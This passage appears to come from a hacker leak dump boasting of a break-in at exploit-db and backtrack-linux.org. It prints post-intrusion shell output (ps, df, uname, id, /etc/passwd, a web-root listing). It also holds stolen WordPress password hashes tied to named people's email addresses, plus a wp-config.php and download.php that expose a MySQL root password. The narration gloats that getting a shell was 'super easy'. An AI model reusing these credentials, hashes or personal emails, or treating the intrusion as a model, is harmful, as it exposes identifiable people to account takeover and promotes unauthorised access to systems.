3423ossec 14291 0.0 0.0 14924 3052 ? S Dec02 0:43 /var/ossec/bin/ossec-analysisd
3424root 14295 0.0 0.0 4236 584 ? S Dec02 0:22 /var/ossec/bin/ossec-logcollector
3425www-data 14315 0.0 0.4 352972 29480 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3426www-data 14316 0.2 0.5 353360 31168 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3427www-data 14317 0.1 0.5 354404 30832 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3428www-data 14345 0.2 0.4 352592 30052 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3429www-data 14346 0.1 0.4 354008 30416 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3430www-data 14348 0.1 0.4 352356 29156 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3431www-data 14350 0.0 0.1 347492 10892 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3432www-data 14351 0.1 0.4 353272 30452 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3433www-data 14352 0.3 0.5 354176 31516 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3434www-data 14355 0.3 0.4 352328 29492 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3435www-data 14356 0.2 0.5 354200 31508 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3436www-data 14357 0.0 0.4 352584 28180 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3437root 14361 0.0 0.0 4996 1664 ? S Dec02 0:34 /var/ossec/bin/ossec-syscheckd
3438ossec 14365 0.0 0.0 12764 844 ? S Dec02 0:00 /var/ossec/bin/ossec-monitord
3439www-data 14366 0.2 0.4 352348 29836 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3440www-data 14367 0.1 0.4 353492 30468 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3441www-data 14369 0.1 0.4 353424 30616 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3442www-data 14370 0.1 0.5 356216 31440 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3443www-data 14371 0.2 0.5 353996 31636 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3444www-data 14372 0.1 0.4 352356 28228 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3445www-data 14377 0.0 0.1 347236 10808 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3446www-data 14378 0.2 0.4 352612 29308 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3447root 14386 0.0 0.0 0 0 ? Z 15:07 0:00 [host-deny.sh] <defunct>
3448root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] <defunct>
3449www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3450www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start
3451www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3452www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3453www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3454www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3455www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3456www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3457www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3458www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] <defunct>
3459www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3460www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3461www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3462www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3463www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3464www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3465www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3466www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3467www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3468www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3469www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3470www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3471www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3472www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3473www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3474www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3475www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start
3476www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux
3477root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
3478root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/
3479root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
3480root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
3481root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/
3482mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld
3483
3484$ df -h
3485Filesystem Size Used Avail Use% Mounted on
3486/dev/sda1 48G 17G 29G 37% /
3487none 3.0G 172K 3.0G 1% /dev
3488none 3.0G 0 3.0G 0% /dev/shm
3489none 3.0G 56K 3.0G 1% /var/run
3490none 3.0G 0 3.0G 0% /var/lock
3491none 3.0G 0 3.0G 0% /lib/init/rw
3492none 48G 17G 29G 37% /var/lib/ureadahead/debugfs
3493
3494Wordpress:
3495admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com
3496dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com
3497innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com
3498ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com
3499sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com
3500loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com
3501ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com
3502dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net
3503emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org
3504j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com
3505ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com
3506Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com
3507fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com
3508rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com
3509djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info
3510xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net
3511muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com
3512Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com
3513didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org
3514zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com
3515bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com
3516bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com
3517h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com
3518MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net
3519marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net
3520code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com
3521Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com
3522Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com
3523TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be
3524kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt
3525ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com
3526fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com
3527root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com
3528
3529,_._._._._._._._|____________________________________________________
3530|_|_|_|_|_|_|_|_|___________________________________________________/
3531 ~ backtrack ~ !
3532
3533Since we already tapped into exploit-db and their server lies in the
3534same subnet with backtrack, we decided to check out their mad
3535security. Backtrack is run by muts, the same guy who also administers
3536exploit-db, so no wonder why it was super easy to get a shell...
3537
3538
3539$ uname -a
3540Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
3541
3542$ id
3543uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0
3544
3545$ alias ls="ls -la"
3546
3547$ ls
3548total 110
3549dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .
3550dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 ..
3551-rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck
3552drwx------. 2 root root 4096 Dec 10 03:40 backup
3553dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin
3554dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot
3555drwxr-xr-x. 17 root root 3580 Dec 7 08:43 dev
3556drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc
3557drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home
3558dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib
3559dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64
3560drwx------. 2 root root 16384 Aug 11 02:01 lost+found
3561drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint
3562drwxr-xr-x. 2 root root 4096 Aug 25 2009 media
3563drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt
3564drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt
3565dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc
3566drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery
3567dr-xr-x---. 4 root root 4096 Dec 10 08:50 root
3568dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin
3569drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux
3570drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv
3571drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys
3572drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp
3573drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr
3574drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var
3575
3576
3577$ cat /etc/issue
3578Fedora release 12 (Constantine)
3579Kernel \r on an \m (\l)
3580
3581$ cat /etc/passwd
3582root:x:0:0:root:/root:/bin/bash
3583bin:x:1:1:bin:/bin:/sbin/nologin
3584daemon:x:2:2:daemon:/sbin:/sbin/nologin
3585adm:x:3:4:adm:/var/adm:/sbin/nologin
3586lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
3587sync:x:5:0:sync:/sbin:/bin/sync
3588shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
3589halt:x:7:0:halt:/sbin:/sbin/halt
3590mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
3591uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
3592operator:x:11:0:operator:/root:/sbin/nologin
3593games:x:12:100:games:/usr/games:/sbin/nologin
3594gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
3595ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
3596nobody:x:99:99:Nobody:/:/sbin/nologin
3597vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
3598dbus:x:81:81:System message bus:/:/sbin/nologin
3599mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
3600smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
3601sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
3602apache:x:48:494:Apache:/var/www:/sbin/nologin
3603mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
3604ossec:x:500:500::/var/ossec:/sbin/nologin
3605ossecm:x:501:500::/var/ossec:/sbin/nologin
3606ossecr:x:502:500::/var/ossec:/sbin/nologin
3607ntp:x:38:38::/etc/ntp:/sbin/nologin
3608tcpdump:x:72:72::/:/sbin/nologin
3609
3610$ cd
3611/var/www/html/
3612
3613$ ls
3614total 90224
3615drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .
3616drwxr-xr-x. 6 root root 4096 Aug 18 10:30 ..
3617-rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess
3618-rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT
3619-rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG
3620-rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG
3621drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads
3622-rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg
3623-rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png
3624-rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png
3625-rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent
3626-rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent
3627-rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt
3628-rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png
3629-rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png
3630-rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html
3631-rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin
3632-rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic
3633-rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin
3634drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents
3635-rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php
3636-rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php
3637-rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php
3638-rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php
3639-rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg
3640-rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico
3641drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums
3642-rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png
3643-rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html
3644-rw-r--r--. 1 apache apache 23 Aug 11 03:17 googlehostedservice.html
3645-rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg
3646-rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg
3647-rw-r--r--. 1 apache apache 2197361 Sep 17 08:15 hola2.jpg
3648-rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png
3649-rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png
3650drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images
3651-rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html
3652-rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php
3653-rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png
3654-rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz
3655-rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt
3656-rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
3657-rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf
3658-rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar
3659-rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg
3660-rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg
3661drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches
3662-rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php
3663-rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html
3664-rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php
3665-rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php
3666-rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php
3667-rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php
3668-rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php
3669-rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml
3670-rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz
3671drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider
3672-rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png
3673-rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php
3674-rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt
3675-rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css
3676-rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php
3677drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents
3678drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki
3679-rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php
3680drwxr-xr-x. 8 apache apache 4096 Dec 5 08:12 wp-admin
3681-rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php
3682-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php
3683-rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php
3684-rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php
3685-rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php
3686-rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php
3687-rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php
3688drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content
3689-rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php
3690-rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php
3691drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes
3692-rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php
3693-rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php
3694-rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php
3695-rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php
3696-rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php
3697-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php
3698-rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php
3699-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php
3700-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php
3701-rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php
3702-rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php
3703-rw-r--r--. 1 apache apache 3702 Dec 9 12:20 wp-trackback.php
3704-rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png
3705-rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif
3706-rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php
3707
3708$ cat wp-config.php
3709<?php
3710/** Enable W3 Total Cache **/
3711define('WP_CACHE', true); // Added by W3 Total Cache
3712
3713/**
3714 * The base configurations of the WordPress.
3715 *
3716 * This file has the following configurations: MySQL settings, Table Prefix,
3717 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
3718 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
3719 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
3720 *
3721 * This file is used by the wp-config.php creation script during the
3722 * installation. You don't have to use the web site, you can just copy this file
3723 * to "wp-config.php" and fill in the values.
3724 *
3725 * @package WordPress
3726 */
3727
3728// ** MySQL settings - You can get this info from your web host ** //
3729/** The name of the database for WordPress */
3730define('DB_NAME', 'blog');
3731
3732/** MySQL database username */
3733define('DB_USER', 'root');
3734
3735/** MySQL database password */
3736define('DB_PASSWORD', '234hi2u3d98as7d23kuh');
3737
3738/** MySQL hostname */
3739define('DB_HOST', 'localhost');
3740
3741/** Database Charset to use in creating database tables. */
3742define('DB_CHARSET', 'utf8');
3743
3744/** The Database Collate type. Don't change this if in doubt. */
3745define('DB_COLLATE', '');
3746
3747/**#@+
3748 * Authentication Unique Keys.
3749 *
3750 * Change these to different unique phrases!
3751 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
3752 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
3753 *
3754 * @since 2.6.0
3755 */
3756define('AUTH_KEY', 'put your unique phrase here');
3757define('SECURE_AUTH_KEY', 'put your unique phrase here');
3758define('LOGGED_IN_KEY', 'put your unique phrase here');
3759define('NONCE_KEY', 'put your unique phrase here');
3760/**#@-*/
3761
3762/**
3763 * WordPress Database Table prefix.
3764 *
3765 * You can have multiple installations in one database if you give each a unique
3766 * prefix. Only numbers, letters, and underscores please!
3767 */
3768$table_prefix = 'wp_';
3769
3770/**
3771 * WordPress Localized Language, defaults to English.
3772 *
3773 * Change this to localize WordPress. A corresponding MO file for the chosen
3774 * language must be installed to wp-content/languages. For example, install
3775 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
3776 * language support.
3777 */
3778define ('WPLANG', '');
3779
3780/* That's all, stop editing! Happy blogging. */
3781
3782/** WordPress absolute path to the Wordpress directory. */
3783if ( !defined('ABSPATH') )
3784 define('ABSPATH', dirname(__FILE__) . '/');
3785
3786/** Sets up WordPress vars and included files. */
3787require_once(ABSPATH . 'wp-settings.php');
3788
3789$ cat show.php
3790<?php
3791include 'stats.txt';
3792?>
3793$ cat stats.txt
3794BackTrack 4 - 4916323 downloads
3795
3796cat download.php
3797<?php
3798
3799// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!
3800
3801function getRealIpAddr()
3802{
3803 if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet
3804 {
3805 $ip=$_SERVER['HTTP_CLIENT_IP'];
3806 }
3807 elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy
3808 {
3809 $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
3810 }
3811 else
3812 {
3813 $ip=$_SERVER['REMOTE_ADDR'];
3814 }
3815 return $ip;
3816}
3817
3818$ip=getRealIpAddr();
3819
3820$username="root";
3821$password="234hi2u3d98as7d23kuh";
3822$database="counter";
3823
3824function choose($iso)
3825{
3826
3827 $num = Rand (1,5);
3828 switch ($num)
3829 {
3830 case 1:
3831 $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
3832 break;
3833
3834 case 2:
3835 $link="http://ftp.uio.no/pub/security/backtrack/$iso";
3836 break;
3837
3838 case 3:
3839 $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
3840 break;
3841
3842 case 4:
3843 $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
3844 break;
3845
3846 case 5:
3847 $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
3848 break;
3849
3850// case 6:
3851// $link="http://moon.backtrack-linux.org/downloads/$iso";
3852// break;
3853
3854
3855 }
3856
3857
3858return $link;
3859
3860}
3861
3862
3863$version=$_GET["fname"];
3864
3865if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))
3866
3867{
3868 echo "This page cannot be accessed directly.";
3869 exit;
3870}
3871
3872if ($version=="bt4r2")
3873{
3874
3875 $iso="bt4-r2.iso";
3876 $link=choose($iso);
3877
3878mysql_connect("localhost",$username,$password);
3879@mysql_select_db($database) or die( "Unable to select database");
3880$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3881mysql_query($query);
3882mysql_close();
3883
3884 header( "Location: $link ");
3885 exit;
3886}
3887
3888
3889if ($version=="bt4r2vm")
3890{
3891
3892 $iso="bt4-r2-vm.tar.bz2";
3893 $link=choose($iso);
3894
3895mysql_connect("localhost",$username,$password);
3896@mysql_select_db($database) or die( "Unable to select database");
3897$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3898mysql_query($query);
3899mysql_close();
3900
3901 header( "Location: $link ");
3902 exit;
3903}
3904
3905
3906
3907if ($version=="bt4f")
3908{
3909
3910 $iso="bt4-final.iso";
3911 $link=choose($iso);
3912
3913mysql_connect("localhost",$username,$password);
3914@mysql_select_db($database) or die( "Unable to select database");
3915$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3916mysql_query($query);
3917mysql_close();
3918
3919 header( "Location: $link ");
3920 exit;
3921}
3922
3923elseif ($version=="bt4fvm")
3924{
3925 $iso="bt4-final-vm.zip";
3926 $link=choose($iso);
3927
3928mysql_connect("localhost",$username,$password);
3929@mysql_select_db($database) or die( "Unable to select database");
3930$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3931mysql_query($query);
3932mysql_close();
3933
3934 header( "Location: $link ");
3935 exit;
3936}
3937
3938elseif ($version=="bt4r1")
3939{
3940 $iso="bt4-r1.iso";
3941 $link=choose($iso);
3942
3943mysql_connect("localhost",$username,$password);
3944@mysql_select_db($database) or die( "Unable to select database");
3945$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3946mysql_query($query);
3947mysql_close();
3948
3949 header( "Location: $link ");
3950 exit;
3951}
3952
3953elseif ($version=="bt4r1vm")
3954{
3955 $iso="bt4-r1-vm.tar.bz2";
3956 $link=choose($iso);
3957
3958mysql_connect("localhost",$username,$password);
3959@mysql_select_db($database) or die( "Unable to select database");
3960$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3961mysql_query($query);
3962mysql_close();
3963
3964 header( "Location: $link ");
3965 exit;
3966}
3967
3968elseif ($version=="bt4pf")
3969{
3970 $iso="bt4-pre-final.iso";
3971 $link=choose($iso);
3972
3973mysql_connect("localhost",$username,$password);
3974@mysql_select_db($database) or die( "Unable to select database");
3975$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3976mysql_query($query);
3977mysql_close();
3978
3979 header( "Location: $link ");
3980 exit;
3981}
3982
3983elseif ($version=="bt4b")
3984{
3985 $iso="bt4-beta.iso";
3986 $link=choose($iso);
3987mysql_connect("localhost",$username,$password);
3988@mysql_select_db($database) or die( "Unable to select database");
3989$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
3990mysql_query($query);
3991mysql_close();
3992 header( "Location: $link ");
3993 exit;
3994}
3995
3996elseif ($version=="bt4bvm")
3997{
3998 $iso="bt4-beta-vm-6.5.1.rar";
3999 $link=choose($iso);
4000mysql_connect("localhost",$username,$password);
4001@mysql_select_db($database) or die( "Unable to select database");
4002$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
4003mysql_query($query);
4004mysql_close();
4005 header( "Location: $link ");
4006 exit;
4007}
4008
4009elseif ($version=="bt3")
4010{
4011 $iso="bt3-final.iso";
4012 $link=choose($iso);
4013mysql_connect("localhost",$username,$password);
